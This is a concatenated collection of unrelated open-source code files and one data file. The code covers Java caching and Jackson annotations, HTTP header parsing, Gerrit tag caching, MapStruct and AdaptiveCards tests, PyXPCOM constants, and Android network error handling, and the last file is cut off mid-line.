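A small illustrative sketch of the CacheLoader interface above, not part of the jetcache sources: load is the single abstract method, so a lambda suffices, and loadAll and apply fall back to the defaults shown above. The "backing store" here is just string concatenation.

import java.util.Arrays;
import java.util.HashSet;
import java.util.Map;

import com.alicp.jetcache.CacheLoader;

public class CacheLoaderDemo {
    public static void main(String[] args) throws Throwable {
        // A lambda implements load(K).
        CacheLoader<Long, String> loader = key -> "user-" + key;

        String one = loader.load(1L);                                        // "user-1"
        Map<Long, String> batch = loader.loadAll(new HashSet<>(Arrays.asList(1L, 2L, 3L)));

        // apply() delegates to load() and wraps failures in CacheInvokeException.
        String viaFunction = loader.apply(4L);

        System.out.println(one + ", " + batch.size() + " batch entries, " + viaFunction);
    }
}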
424
826
<reponame>perlun/jackson-annotations<filename>src/main/java/com/fasterxml/jackson/annotation/Nulls.java package com.fasterxml.jackson.annotation; /** * Enumeration used with {@link JsonSetter} (for properties `nulls` * and `contentNulls`) * to define how explicit `null` values from input (if input format * has the concept; JSON, for example does) are handled. */ public enum Nulls { /** * Value that indicates that an input null should result in assignment * of Java `null` value of matching property (except where deserializer * indicates other "null value" by overriding <code>getNullValue(...)</code> * method) */ SET, /** * Value that indicates that an input null value should be skipped and * no assignment is to be made; this usually means that the property * will have its default value. */ SKIP, /** * Value that indicates that an exception (of type that indicates input mismatch * problem) is to be thrown, to indicate that null values are not accepted. */ FAIL, /** * Value that indicates that value to assign should come from the value * deserializer of the type, using method <code>getEmptyValue()</code>. */ AS_EMPTY, /** * Pseudo-value used to indicate that defaults are to be used for handling, * that is, this value specifies no explicit handling override. */ DEFAULT ; }
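A short sketch of how this enum is typically wired into a setter through JsonSetter; the Person class below is illustrative only. With nulls = Nulls.SKIP, an explicit JSON null for the property is ignored and the field keeps its default value.

import com.fasterxml.jackson.annotation.JsonSetter;
import com.fasterxml.jackson.annotation.Nulls;

public class Person {
    private String name = "unknown";

    // An explicit `"name": null` in the input is skipped, so "unknown" survives.
    @JsonSetter(nulls = Nulls.SKIP)
    public void setName(String name) {
        this.name = name;
    }

    public String getName() {
        return name;
    }
}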
467
348
<reponame>chamberone/Leaflet.PixiOverlay<filename>docs/data/leg-t2/081/08102061.json {"nom":"Castanet","circ":"2ème circonscription","dpt":"Tarn","inscrits":163,"abs":60,"votants":103,"blancs":4,"nuls":10,"exp":89,"res":[{"nuance":"REM","nom":"<NAME>","voix":71},{"nuance":"FN","nom":"Mme <NAME>","voix":18}]}
130
601
#include "toml.hpp" #include <iostream> #include <iomanip> int main(int argc, char **argv) { if(argc != 3) { std::cerr << "usage: ./check [filename] [valid|invalid]" << std::endl; return 1; } const std::string file_kind(argv[2]); try { const auto data = toml::parse(argv[1]); std::cout << std::setprecision(16) << std::setw(80) << data; if(file_kind == "valid") { return 0; } else { return 1; } } catch(const toml::syntax_error& err) { std::cout << "what(): " << err.what() << std::endl; if(file_kind == "invalid") { return 0; } else { return 1; } } return 127; }
442
4,465
<filename>bridge/bindings/qjs/html_parser.h /* * Copyright (C) 2021 Alibaba Inc. All rights reserved. * Author: <NAME>. */ #ifndef KRAKENBRIDGE_HTML_PARSER_H #define KRAKENBRIDGE_HTML_PARSER_H #include "bindings/qjs/dom/element.h" #include "executing_context.h" #include "include/kraken_bridge.h" #include "third_party/gumbo-parser/src/gumbo.h" namespace kraken::binding::qjs { class HTMLParser { public: static bool parseHTML(const char* code, size_t codeLength, NodeInstance* rootNode); static bool parseHTML(std::string html, NodeInstance* rootNode); private: ExecutionContext* m_context; static void traverseHTML(NodeInstance* root, GumboNode* node); static void parseProperty(ElementInstance* element, GumboElement* gumboElement); }; } // namespace kraken::binding::qjs #endif // KRAKENBRIDGE_HTML_PARSER_H
287
403
package io.craft.atom.protocol.http.model; import static io.craft.atom.protocol.http.HttpConstants.S_COLON; import static io.craft.atom.protocol.http.HttpConstants.S_COMMA; import static io.craft.atom.protocol.http.HttpConstants.S_CR; import static io.craft.atom.protocol.http.HttpConstants.S_EQUAL_SIGN; import static io.craft.atom.protocol.http.HttpConstants.S_LF; import static io.craft.atom.protocol.http.HttpConstants.S_SEMICOLON; import static io.craft.atom.protocol.http.HttpConstants.S_SP; import java.io.Serializable; import java.util.ArrayList; import java.util.List; import lombok.Getter; import lombok.Setter; import lombok.ToString; /** * Represents a HTTP header field. * * <p> * The HTTP header fields follow the same generic format as that given in * Section 3.1 of RFC 822. Each header field consists of a name followed by a * colon (":") and the field value. Field names are case-insensitive. The field * value MAY be preceded by any amount of LWS(Linear White Space), though a single SP is preferred. * * <pre> * LWS = [CRLF] 1*( SP | HT ) * HT = Horizontal Tab * SP = Space * CRLF = Carriage return/Line feed * </pre> * * <pre> * message-header = field-name ":" [ field-value ] * field-name = token * field-value = *( field-content | LWS ) * field-content = &lt;the OCTETs making up the field-value * and consisting of either *TEXT or combinations * of token, separators, and quoted-string&gt; * </pre> * * @author mindwind * @version 1.0, Feb 1, 2013 * @see HttpMessage */ @ToString(of = { "name", "value" }) public class HttpHeader implements Serializable { private static final long serialVersionUID = -689954816191532018L; @Getter @Setter private String name ; @Getter @Setter private String value; // ~ ----------------------------------------------------------------------------------------------------------- public HttpHeader() { super(); } public HttpHeader(String name, String value) { this.name = name; this.value = value; } // ~ ----------------------------------------------------------------------------------------------------------- public void appendValue(String valuePart) { if (value == null) { value = valuePart; } else { this.value += valuePart; } } /** * Parses the header string value and return a list of {@code HttpHeaderValueElement} * * @return a list of {@code HttpHeaderValueElement} */ public List<HttpHeaderValueElement> getValueElements() { List<HttpHeaderValueElement> elements = new ArrayList<HttpHeaderValueElement>(); if (value == null || value.length() == 0) { return elements; } String[] earr = value.split(S_COMMA); for (String es : earr) { HttpHeaderValueElement hve = new HttpHeaderValueElement(); String[] nvs = es.split(S_SEMICOLON); parseNameValue(hve, nvs[0]); for (int i = 1; i < nvs.length; i++) { parseParams(hve, nvs[i]); } elements.add(hve); } return elements; } private void parseParams(HttpHeaderValueElement hve, String pnv) { String[] nvpair = pnv.split(S_EQUAL_SIGN); if (nvpair.length > 1) { hve.addParam(nvpair[0], nvpair[1]); } else { hve.addParam(nvpair[0], null); } } private void parseNameValue(HttpHeaderValueElement hve, String nv) { String[] nvpair = nv.split(S_EQUAL_SIGN); hve.setName(nvpair[0]); if (nvpair.length > 1) { hve.setValue(nvpair[1]); } } public String toHttpString() { StringBuilder sb = new StringBuilder(); sb.append(getName()).append(S_COLON).append(S_SP).append(getValue()).append(S_CR).append(S_LF); return sb.toString(); } }
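A brief usage sketch for the HttpHeader class above, illustrative rather than part of the library: it shows how a comma-separated header value is split into value elements and how the header renders back to wire format.

import java.util.List;

import io.craft.atom.protocol.http.model.HttpHeader;
import io.craft.atom.protocol.http.model.HttpHeaderValueElement;

public class HttpHeaderDemo {
    public static void main(String[] args) {
        HttpHeader header = new HttpHeader("Accept", "text/html;q=0.9,application/json");

        // "text/html;q=0.9" and "application/json" become two value elements;
        // q=0.9 is parsed as a parameter of the first element.
        List<HttpHeaderValueElement> elements = header.getValueElements();
        System.out.println(elements.size() + " element(s): " + elements);

        // Renders "Accept: text/html;q=0.9,application/json" followed by CRLF.
        System.out.print(header.toHttpString());
    }
}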
1,369
743
<reponame>SidGulatiMsft/AdaptiveCards package io.adaptivecards.objectmodel; import org.junit.Assert; import org.junit.Test; import java.io.IOException; import static org.junit.Assert.*; public class SubmitActionPropertiesTest { static { System.loadLibrary("adaptivecards-native-lib"); } @Test public void AllPropertiesTest() { } @Test public void dataJsonTest() throws Exception { { SubmitAction submitAction = TestUtil.createMockSubmitAction(); Assert.assertEquals(s_defaultSubmitAction, submitAction.Serialize()); ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(s_defaultSubmitAction), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("null\n", parsedSubmitAction.GetDataJson()); } { final String submitActionWithEmptyData = "{\"data\":{},\"type\":\"Action.Submit\"}"; ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(submitActionWithEmptyData), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("{}\n", parsedSubmitAction.GetDataJson()); } { final String submitActionDataJson = "{\"data\":{\"data\":\"Some data\"},\"type\":\"Action.Submit\"}\n"; SubmitAction submitAction = TestUtil.createSampleSubmitAction(); Assert.assertEquals(submitActionDataJson, submitAction.Serialize()); ParseResult result = AdaptiveCard.DeserializeFromString(TestUtil.encloseActionJsonInCard(submitActionDataJson), "1.0"); SubmitAction parsedSubmitAction = TestUtil.castToSubmitAction(result.GetAdaptiveCard().GetActions().get(0)); Assert.assertEquals("{\"data\":\"Some data\"}\n", parsedSubmitAction.GetDataJson()); } } private static final String s_defaultSubmitAction = "{\"type\":\"Action.Submit\"}\n"; }
828
1,609
<gh_stars>1000+
package com.mossle.meeting.support;

import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Map;

import com.mossle.meeting.persistence.domain.MeetingInfo;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class DurationHelper {
    private static Logger logger = LoggerFactory
            .getLogger(DurationHelper.class);
    private String defaultStartTime = "9:00";
    private String defaultEndTime = "18:00";
    private long defaultStart;
    private long defaultEnd;
    private List<TimeRange> timeRanges = new ArrayList<TimeRange>();

    public void process(String calendarDate, List<MeetingInfo> meetingInfos)
            throws Exception {
        defaultStart = new SimpleDateFormat("yyyy-MM-dd HH:mm").parse(
                calendarDate + " " + defaultStartTime).getTime();
        defaultEnd = new SimpleDateFormat("yyyy-MM-dd HH:mm").parse(
                calendarDate + " " + defaultEndTime).getTime();

        // empty
        if (meetingInfos.isEmpty()) {
            this.addTimeRange(defaultStart, defaultEnd, "idle", null);

            return;
        }

        // first
        MeetingInfo first = meetingInfos.get(0);

        if (first.getStartTime().getTime() > defaultStart) {
            this.addTimeRange(defaultStart, first.getStartTime().getTime(),
                    "idle", null);
        }

        for (int i = 0; i < meetingInfos.size(); i++) {
            MeetingInfo current = meetingInfos.get(i);

            if (i == 0) {
                this.addTimeRange(current.getStartTime().getTime(), current
                        .getEndTime().getTime(), "busy", current.getOrganizer());

                continue;
            }

            MeetingInfo previous = meetingInfos.get(i - 1);

            if (previous.getEndTime().getTime() < current.getStartTime()
                    .getTime()) {
                this.addTimeRange(previous.getEndTime().getTime(), current
                        .getStartTime().getTime(), "idle", null);
            }

            this.addTimeRange(current.getStartTime().getTime(), current
                    .getEndTime().getTime(), "busy", current.getOrganizer());
        }

        // last
1,979
479
<filename>gerrit-server/src/main/java/com/google/gerrit/server/git/TagCache.java // Copyright (C) 2011 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.server.git; import com.google.common.cache.Cache; import com.google.gerrit.reviewdb.client.Project; import com.google.gerrit.server.cache.CacheModule; import com.google.inject.Inject; import com.google.inject.Module; import com.google.inject.Singleton; import com.google.inject.name.Named; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.Serializable; import org.eclipse.jgit.lib.ObjectId; @Singleton public class TagCache { private static final String CACHE_NAME = "git_tags"; public static Module module() { return new CacheModule() { @Override protected void configure() { persist(CACHE_NAME, String.class, EntryVal.class); bind(TagCache.class); } }; } private final Cache<String, EntryVal> cache; private final Object createLock = new Object(); @Inject TagCache(@Named(CACHE_NAME) Cache<String, EntryVal> cache) { this.cache = cache; } /** * Advise the cache that a reference fast-forwarded. * * <p>This operation is not necessary, the cache will automatically detect changes made to * references and update itself on demand. However, this method may allow the cache to update more * quickly and reuse the caller's computation of the fast-forward status of a branch. * * @param name project the branch is contained in. * @param refName the branch name. * @param oldValue the old value, before the fast-forward. The cache will only update itself if it * is still using this old value. * @param newValue the current value, after the fast-forward. */ public void updateFastForward( Project.NameKey name, String refName, ObjectId oldValue, ObjectId newValue) { // Be really paranoid and null check everything. This method should // never fail with an exception. Some of these references can be null // (e.g. not all projects are cached, or the cache is not current). 
// EntryVal val = cache.getIfPresent(name.get()); if (val != null) { TagSetHolder holder = val.holder; if (holder != null) { TagSet tags = holder.getTagSet(); if (tags != null) { if (tags.updateFastForward(refName, oldValue, newValue)) { cache.put(name.get(), val); } } } } } TagSetHolder get(Project.NameKey name) { EntryVal val = cache.getIfPresent(name.get()); if (val == null) { synchronized (createLock) { val = cache.getIfPresent(name.get()); if (val == null) { val = new EntryVal(); val.holder = new TagSetHolder(name); cache.put(name.get(), val); } } } return val.holder; } void put(Project.NameKey name, TagSetHolder tags) { EntryVal val = new EntryVal(); val.holder = tags; cache.put(name.get(), val); } static class EntryVal implements Serializable { static final long serialVersionUID = 1L; transient TagSetHolder holder; private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { holder = new TagSetHolder(new Project.NameKey(in.readUTF())); if (in.readBoolean()) { TagSet tags = new TagSet(holder.getProjectName()); tags.readObject(in); holder.setTagSet(tags); } } private void writeObject(ObjectOutputStream out) throws IOException { TagSet tags = holder.getTagSet(); out.writeUTF(holder.getProjectName().get()); out.writeBoolean(tags != null); if (tags != null) { tags.writeObject(out); } } } }
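A hypothetical caller sketch for the advisory updateFastForward call documented above, not part of Gerrit itself: it assumes a TagCache instance is already available through Guice injection, and the project name, ref name, and object ids below are placeholders.

import com.google.gerrit.reviewdb.client.Project;
import com.google.gerrit.server.git.TagCache;
import com.google.inject.Inject;
import org.eclipse.jgit.lib.ObjectId;

public class TagCacheCaller {
  private final TagCache tagCache;

  @Inject
  TagCacheCaller(TagCache tagCache) {
    this.tagCache = tagCache;
  }

  void onBranchFastForward() {
    // Placeholder ids standing in for the commits before and after the fast-forward.
    ObjectId oldValue = ObjectId.fromString("0123456789012345678901234567890123456789");
    ObjectId newValue = ObjectId.fromString("abcdefabcdefabcdefabcdefabcdefabcdefabcd");

    // Purely advisory: the cache would also pick up the change lazily on demand.
    tagCache.updateFastForward(new Project.NameKey("demo/project"), "refs/heads/master",
        oldValue, newValue);
  }
}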
1,498
5,133
<gh_stars>1000+ /* * Copyright MapStruct Authors. * * Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0 */ package org.mapstruct.ap.test.bugs._2149; import org.mapstruct.BeanMapping; import org.mapstruct.Mapper; import org.mapstruct.Mapping; /** * @author <NAME> */ @Mapper public interface Erroneous2149Mapper { @BeanMapping(ignoreByDefault = true) @Mapping(target = ".", source = "name") Target map(Source source); class Target { private String firstName; private String age; private String address; public String getFirstName() { return firstName; } public void setFirstName(String firstName) { this.firstName = firstName; } public String getAge() { return age; } public void setAge(String age) { this.age = age; } public String getAddress() { return address; } public void setAddress(String address) { this.address = address; } } class Source { private final String age; private final Name name; public Source(String age, Name name) { this.age = age; this.name = name; } public String getAge() { return age; } public Name getName() { return name; } } class Name { private final String firstName; public Name(String firstName) { this.firstName = firstName; } public String getFirstName() { return firstName; } } }
763
521
<gh_stars>100-1000 # ***** BEGIN LICENSE BLOCK ***** # Version: MPL 1.1/GPL 2.0/LGPL 2.1 # # The contents of this file are subject to the Mozilla Public License Version # 1.1 (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # http://www.mozilla.org/MPL/ # # Software distributed under the License is distributed on an "AS IS" basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # # The Original Code is the Python XPCOM language bindings. # # The Initial Developer of the Original Code is # ActiveState Tool Corp. # Portions created by the Initial Developer are Copyright (C) 2000, 2001 # the Initial Developer. All Rights Reserved. # # Contributor(s): # <NAME> <<EMAIL>> (original author) # # Alternatively, the contents of this file may be used under the terms of # either the GNU General Public License Version 2 or later (the "GPL"), or # the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), # in which case the provisions of the GPL or the LGPL are applicable instead # of those above. If you wish to allow use of your version of this file only # under the terms of either the GPL or the LGPL, and not to allow others to # use your version of this file under the terms of the MPL, indicate your # decision by deleting the provisions above and replace them with the notice # and other provisions required by the GPL or the LGPL. If you do not delete # the provisions above, a recipient may use your version of this file under # the terms of any one of the MPL, the GPL or the LGPL. # # ***** END LICENSE BLOCK ***** # Could maybe later have a process that extracted these enums should they change. 
# from nsFileLocations.h App_DirectoryBase = 0x00010000 App_PrefsDirectory30 = App_DirectoryBase + 1 App_PrefsDirectory40 = App_DirectoryBase + 2 App_PrefsDirectory50 = App_DirectoryBase + 3 App_ResDirectory = App_DirectoryBase + 5 App_UserProfileDirectory30 = App_DirectoryBase + 10 App_UserProfileDirectory40 = App_DirectoryBase + 11 App_UserProfileDirectory50 = App_DirectoryBase + 12 App_DefaultUserProfileRoot30 = App_DirectoryBase + 13 App_DefaultUserProfileRoot40 = App_DirectoryBase + 14 App_DefaultUserProfileRoot50 = App_DirectoryBase + 15 App_ProfileDefaultsFolder30 = App_DirectoryBase + 16 App_ProfileDefaultsFolder40 = App_DirectoryBase + 17 App_ProfileDefaultsFolder50 = App_DirectoryBase + 18 App_PrefDefaultsFolder50 = App_DirectoryBase + 19 App_DefaultsFolder50 = App_DirectoryBase + 25 App_ComponentsDirectory = App_DirectoryBase + 30 App_ChromeDirectory = App_DirectoryBase + 31 App_PluginsDirectory = App_DirectoryBase + 32 App_UserChromeDirectory = App_DirectoryBase + 40 App_FileBase = App_DirectoryBase + 1000 App_PreferencesFile30 = App_FileBase + 1 App_PreferencesFile40 = App_FileBase + 2 App_PreferencesFile50 = App_FileBase + 3 App_BookmarksFile30 = App_FileBase + 10 App_BookmarksFile40 = App_FileBase + 11 App_BookmarksFile50 = App_FileBase + 12 App_Registry40 = App_FileBase + 20 App_Registry50 = App_FileBase + 21 App_LocalStore50 = App_FileBase + 30 App_History50 = App_FileBase + 40 App_MailDirectory50 = App_FileBase + 50 App_ImapMailDirectory50 = App_FileBase + 60 App_NewsDirectory50 = App_FileBase + 70 App_MessengerFolderCache50 = App_FileBase + 80 App_UsersPanels50 = App_FileBase + 90 App_SearchFile50 = App_FileBase + 100 App_SearchDirectory50 = App_FileBase + 101 # From nsSpecialSystemDirectory.h OS_DriveDirectory = 1 OS_TemporaryDirectory = 2 OS_CurrentProcessDirectory= 3 OS_CurrentWorkingDirectory= 4 XPCOM_CurrentProcessComponentDirectory= 5 XPCOM_CurrentProcessComponentRegistry= 6 Moz_BinDirectory = 10 Mac_SystemDirectory = 101 Mac_DesktopDirectory = 102 Mac_TrashDirectory = 103 Mac_StartupDirectory = 104 Mac_ShutdownDirectory = 105 Mac_AppleMenuDirectory = 106 Mac_ControlPanelDirectory = 107 Mac_ExtensionDirectory = 108 Mac_FontsDirectory = 109 Mac_PreferencesDirectory = 110 Mac_DocumentsDirectory = 111 Mac_InternetSearchDirectory = 112 Win_SystemDirectory = 201 Win_WindowsDirectory = 202 Win_HomeDirectory = 203 Win_Desktop = 204 Win_Programs = 205 Win_Controls = 206 Win_Printers = 207 Win_Personal = 208 Win_Favorites = 209 Win_Startup = 210 Win_Recent = 211 Win_Sendto = 212 Win_Bitbucket = 213 Win_Startmenu = 214 Win_Desktopdirectory = 215 Win_Drives = 216 Win_Network = 217 Win_Nethood = 218 Win_Fonts = 219 Win_Templates = 220 Win_Common_Startmenu = 221 Win_Common_Programs = 222 Win_Common_Startup = 223 Win_Common_Desktopdirectory = 224 Win_Appdata = 225 Win_Printhood = 226 Unix_LocalDirectory = 301 Unix_LibDirectory = 302 Unix_HomeDirectory = 303 BeOS_SettingsDirectory = 401 BeOS_HomeDirectory = 402 BeOS_DesktopDirectory = 403 BeOS_SystemDirectory = 404 OS2_SystemDirectory = 501 # Type/Variant related constants. 
TD_INT8 = 0 TD_INT16 = 1 TD_INT32 = 2 TD_INT64 = 3 TD_UINT8 = 4 TD_UINT16 = 5 TD_UINT32 = 6 TD_UINT64 = 7 TD_FLOAT = 8 TD_DOUBLE = 9 TD_BOOL = 10 TD_CHAR = 11 TD_WCHAR = 12 TD_VOID = 13 TD_PNSIID = 14 TD_DOMSTRING = 15 TD_PSTRING = 16 TD_PWSTRING = 17 TD_INTERFACE_TYPE = 18 TD_INTERFACE_IS_TYPE = 19 TD_ARRAY = 20 TD_PSTRING_SIZE_IS = 21 TD_PWSTRING_SIZE_IS = 22 TD_UTF8STRING = 23 TD_CSTRING = 24 TD_ASTRING = 25 # From xpt_struct.h XPT_TDP_POINTER = 0x80 XPT_TDP_UNIQUE_POINTER = 0x40 XPT_TDP_REFERENCE = 0x20 XPT_TDP_FLAGMASK = 0xe0 XPT_TDP_TAGMASK = (~XPT_TDP_FLAGMASK) def XPT_TDP_TAG(tdp): return (tdp & XPT_TDP_TAGMASK) def XPT_TDP_IS_POINTER(flags): return (flags & XPT_TDP_POINTER) def XPT_TDP_IS_UNIQUE_POINTER(flags): return (flags & XPT_TDP_UNIQUE_POINTER) def XPT_TDP_IS_REFERENCE(flags): return (flags & XPT_TDP_REFERENCE) XPT_ID_SCRIPTABLE = 0x80 XPT_ID_FLAGMASK = 0x80 XPT_ID_TAGMASK = ~XPT_ID_FLAGMASK def XPT_ID_TAG(id): return id & XPT_ID_TAGMASK def XPT_ID_IS_SCRIPTABLE(flags): return flags & XPT_ID_SCRIPTABLE XPT_PD_IN = 0x80 XPT_PD_OUT = 0x40 XPT_PD_RETVAL = 0x20 XPT_PD_SHARED = 0x10 XPT_PD_DIPPER = 0x08 XPT_PD_FLAGMASK = 0xf0 def XPT_PD_IS_IN(flags): return (flags & XPT_PD_IN) def XPT_PD_IS_OUT(flags): return (flags & XPT_PD_OUT) def XPT_PD_IS_RETVAL(flags): return (flags & XPT_PD_RETVAL) def XPT_PD_IS_SHARED(flags): return (flags & XPT_PD_SHARED) def XPT_PD_IS_DIPPER(flags): return (flags & XPT_PD_DIPPER) XPT_MD_GETTER = 0x80 XPT_MD_SETTER = 0x40 XPT_MD_NOTXPCOM = 0x20 XPT_MD_CTOR = 0x10 XPT_MD_HIDDEN = 0x08 XPT_MD_FLAGMASK = 0xf8 def XPT_MD_IS_GETTER(flags): return (flags & XPT_MD_GETTER) def XPT_MD_IS_SETTER(flags): return (flags & XPT_MD_SETTER) def XPT_MD_IS_NOTXPCOM(flags): return (flags & XPT_MD_NOTXPCOM) def XPT_MD_IS_CTOR(flags): return (flags & XPT_MD_CTOR) def XPT_MD_IS_HIDDEN(flags): return (flags & XPT_MD_HIDDEN) # From xptinfo.h T_I8 = TD_INT8 T_I16 = TD_INT16 T_I32 = TD_INT32 T_I64 = TD_INT64 T_U8 = TD_UINT8 T_U16 = TD_UINT16 T_U32 = TD_UINT32 T_U64 = TD_UINT64 T_FLOAT = TD_FLOAT T_DOUBLE = TD_DOUBLE T_BOOL = TD_BOOL T_CHAR = TD_CHAR T_WCHAR = TD_WCHAR T_VOID = TD_VOID T_IID = TD_PNSIID T_DOMSTRING = TD_DOMSTRING T_CHAR_STR = TD_PSTRING T_WCHAR_STR = TD_PWSTRING T_INTERFACE = TD_INTERFACE_TYPE T_INTERFACE_IS = TD_INTERFACE_IS_TYPE T_ARRAY = TD_ARRAY T_PSTRING_SIZE_IS = TD_PSTRING_SIZE_IS T_PWSTRING_SIZE_IS = TD_PWSTRING_SIZE_IS T_UTF8STRING = TD_UTF8STRING T_CSTRING = TD_CSTRING T_ASTRING = TD_ASTRING # from nsIVariant VTYPE_INT8 = 0 VTYPE_INT16 = 1 VTYPE_INT32 = 2 VTYPE_INT64 = 3 VTYPE_UINT8 = 4 VTYPE_UINT16 = 5 VTYPE_UINT32 = 6 VTYPE_UINT64 = 7 VTYPE_FLOAT = 8 VTYPE_DOUBLE = 9 VTYPE_BOOL = 10 VTYPE_CHAR = 11 VTYPE_WCHAR = 12 VTYPE_VOID = 13 VTYPE_ID = 14 VTYPE_DOMSTRING = 15 VTYPE_CHAR_STR = 16 VTYPE_WCHAR_STR = 17 VTYPE_INTERFACE = 18 VTYPE_INTERFACE_IS = 19 VTYPE_ARRAY = 20 VTYPE_STRING_SIZE_IS = 21 VTYPE_WSTRING_SIZE_IS = 22 VTYPE_UTF8STRING = 23 VTYPE_CSTRING = 24 VTYPE_ASTRING = 25 VTYPE_EMPTY_ARRAY = 254 VTYPE_EMPTY = 255
4,650
396
package com.ljy.devring.http.support.throwable;

import android.net.ParseException;

import com.google.gson.Gson;
import com.google.gson.JsonParseException;

import org.json.JSONException;

import java.io.IOException;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.net.UnknownHostException;

import retrofit2.HttpException;

/**
 * author: ljy
 * date: 2017/9/14
 * description: maps exceptions raised by network requests to HttpThrowable results
 */

public class ThrowableHandler {

    /**
     * Handle a throwable and derive the error type plus a user-facing message.
     */
    public static HttpThrowable handleThrowable(Throwable throwable) {
        if (throwable instanceof HttpException) {
            return new HttpThrowable(HttpThrowable.HTTP_ERROR, "网络(协议)异常", throwable); // "network (protocol) error"
        } else if (throwable instanceof JsonParseException || throwable instanceof JSONException || throwable instanceof ParseException) {
            return new HttpThrowable(HttpThrowable.PARSE_ERROR, "数据解析异常", throwable); // "data parsing error"
        } else if (throwable instanceof UnknownHostException) {
            return new HttpThrowable(HttpThrowable.NO_NET_ERROR, "网络连接失败,请稍后重试", throwable); // "network connection failed, please retry later"
        } else if (throwable instanceof SocketTimeoutException) {
            return new HttpThrowable(HttpThrowable.TIME_OUT_ERROR, "连接超时", throwable); // "connection timed out"
        } else if (throwable instanceof ConnectException) {
            return new HttpThrowable(HttpThrowable.CONNECT_ERROR, "连接异常", throwable); // "connection error"
        } else if (throwable instanceof javax.net.ssl.SSLHandshakeException) {
            return new HttpThrowable(HttpThrowable.SSL_ERROR, "证书验证失败", throwable); // "certificate verification failed"
        } else {
            return new HttpThrowable(HttpThrowable.UNKNOWN, throwable.getMessage(), throwable);
        }
    }

    /**
     * Extract the error response body from an HttpException-typed throwable and convert it to the given type.
     *
     * @param throwable a throwable of type HttpException
     * @param clazz     the class describing the format of the error body
     */
    public static <T> T fromJson(Throwable throwable, Class<T> clazz) {
        HttpException httpException = (HttpException) throwable;
        Gson gson = new Gson();
        T t = null;
        try {
            t = gson.fromJson(httpException.response().errorBody().string(), clazz);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return t;
    }
}
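A minimal caller sketch for the handler above; the demo class name is made up and HttpThrowable is assumed to live in the same package as ThrowableHandler, as its unqualified use above suggests.

import java.net.SocketTimeoutException;

import com.ljy.devring.http.support.throwable.HttpThrowable;
import com.ljy.devring.http.support.throwable.ThrowableHandler;

public class ThrowableHandlerDemo {
    public static void main(String[] args) {
        // A socket timeout is classified as HttpThrowable.TIME_OUT_ERROR.
        HttpThrowable result = ThrowableHandler.handleThrowable(new SocketTimeoutException("read timed out"));
        System.out.println(result);
    }
}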
1,061
348
{"nom":"Ychoux","circ":"1ère circonscription","dpt":"Landes","inscrits":1633,"abs":851,"votants":782,"blancs":13,"nuls":11,"exp":758,"res":[{"nuance":"MDM","nom":"<NAME>","voix":290},{"nuance":"FI","nom":"<NAME>","voix":114},{"nuance":"FN","nom":"M. <NAME>","voix":113},{"nuance":"LR","nom":"Mme <NAME>","voix":99},{"nuance":"SOC","nom":"M. <NAME>","voix":74},{"nuance":"ECO","nom":"Mme <NAME>","voix":28},{"nuance":"DLF","nom":"M. <NAME>","voix":13},{"nuance":"COM","nom":"M. <NAME>","voix":8},{"nuance":"EXG","nom":"Mme <NAME>","voix":8},{"nuance":"DIV","nom":"M. <NAME>","voix":5},{"nuance":"DVD","nom":"<NAME>","voix":3},{"nuance":"EXG","nom":"<NAME>","voix":3},{"nuance":"DVD","nom":"Mme <NAME>","voix":0}]}
289
4,283
/* * Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.map.impl.record; import com.hazelcast.internal.serialization.Data; import com.hazelcast.internal.serialization.InternalSerializationService; import com.hazelcast.internal.serialization.impl.DefaultSerializationServiceBuilder; import com.hazelcast.internal.serialization.impl.ObjectDataInputStream; import com.hazelcast.internal.serialization.impl.ObjectDataOutputStream; import com.hazelcast.map.impl.recordstore.expiry.ExpiryMetadata; import com.hazelcast.map.impl.recordstore.expiry.ExpiryMetadataImpl; import com.hazelcast.test.HazelcastParallelClassRunner; import com.hazelcast.test.annotation.ParallelJVMTest; import com.hazelcast.test.annotation.QuickTest; import org.junit.Before; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.runner.RunWith; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import static com.hazelcast.map.impl.record.RecordReaderWriter.DATA_RECORD_WITH_STATS_READER_WRITER; import static org.junit.Assert.assertEquals; @RunWith(HazelcastParallelClassRunner.class) @Category({QuickTest.class, ParallelJVMTest.class}) public class RecordReaderWriterTest { InternalSerializationService ss; @Before public void setUp() throws Exception { DefaultSerializationServiceBuilder ssBuilder = new DefaultSerializationServiceBuilder(); ss = ssBuilder.setVersion(InternalSerializationService.VERSION_1).build(); } @Test public void data_record_with_stats_matching_reader_writer_id_is_data_record_with_stats_reader_writer_id() { assertEquals(DATA_RECORD_WITH_STATS_READER_WRITER, new 